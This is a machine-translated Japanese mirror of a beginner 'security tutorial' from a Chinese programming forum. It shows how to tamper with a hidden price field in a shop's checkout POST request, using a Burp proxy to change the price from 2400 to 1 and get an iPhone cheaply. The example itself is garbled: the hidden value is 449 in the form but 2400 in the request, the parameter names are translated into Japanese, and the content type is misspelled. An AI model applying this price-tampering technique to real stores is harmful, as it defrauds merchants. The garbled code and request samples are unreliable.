この記事は機械翻訳のミラー記事です。元の記事にジャンプするにはこちらをクリックしてください。

Architect_Programmer_Code農業ネットワーク»建築家 その他の技術 安全な攻防 侵入侵入:HTTPヘッダーの適用
眺める: 12586|答える: 0

【安全チュートリアル】 侵入侵入:HTTPヘッダーの適用

[リンクをコピー]
掲載地 2015/02/07 17:59:07 | | |

HTTPヘッダーの適用について

httpヘッダーはウェブサイトの伝送機構で一般的に使われていますが、中国の多くの初心者はこの点に気づいていません。この記事は初心者向けに、httpヘッダーが侵入プロセスで果たす役割について述べています。

ショッピングページを例に挙げて、HTTPヘッダーの役割の一部を分析しましょう。

まず、ショッピングページのフォームを分析しましょう。

<form method="post" action="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br />  <!--注意此行代码-->

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<input type="hidden" name="price" value="449">

<input type="submit" value="Buy">

</form>

開封時に彼のhttpメッセージヘッダーのスクリーンショットを撮って確認してみてください

POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

数量=1&価格=2400

価格フィールドはショッピングページを開く際に表示されませんが、ユーザーによって編集や操作は可能です。

編集を実現する方法は2つあります

1. HTMLソースコードを修正用に保存し、ブラウザに再読み込みして実行します

2. プロキシインターセプションを使ってHTTPヘッダーを修正(ツールBurpのプロキシ構築)

上記のHTTPヘッダーを例に挙げましょう
変更前
POST /shop/2/shop.php?id=1 HTTP/1.1                  
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

数量=1&価格=2400

変更後
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

数量=1&価格=1


最後の行の「Price」欄には2400の値があり、1に変えるとiPhone 4Sをより安く手に入れることができます。

この記事では、LDAP注入のような予期せぬ効果のイメージを提供するに過ぎません。




先の:MySQL パスワードを忘れました 回復パスワード実装方法
次に:完全なウェブサイトパスを取得するためのSQLインジェクション

関連記事
免責事項:
Code Farmer Networkが発行するすべてのソフトウェア、プログラミング資料、記事は学習および研究目的のみを目的としています。 上記の内容は商業的または違法な目的で使用されてはならず、そうでなければ利用者はすべての結果を負うことになります。 このサイトの情報はインターネットからのものであり、著作権紛争はこのサイトとは関係ありません。 ダウンロード後24時間以内に上記の内容を完全にパソコンから削除してください。 もしこのプログラムを気に入ったら、正規のソフトウェアを支持し、登録を購入し、より良い本物のサービスを受けてください。 もし侵害があれば、メールでご連絡ください。
Mail To:help@itsvse.com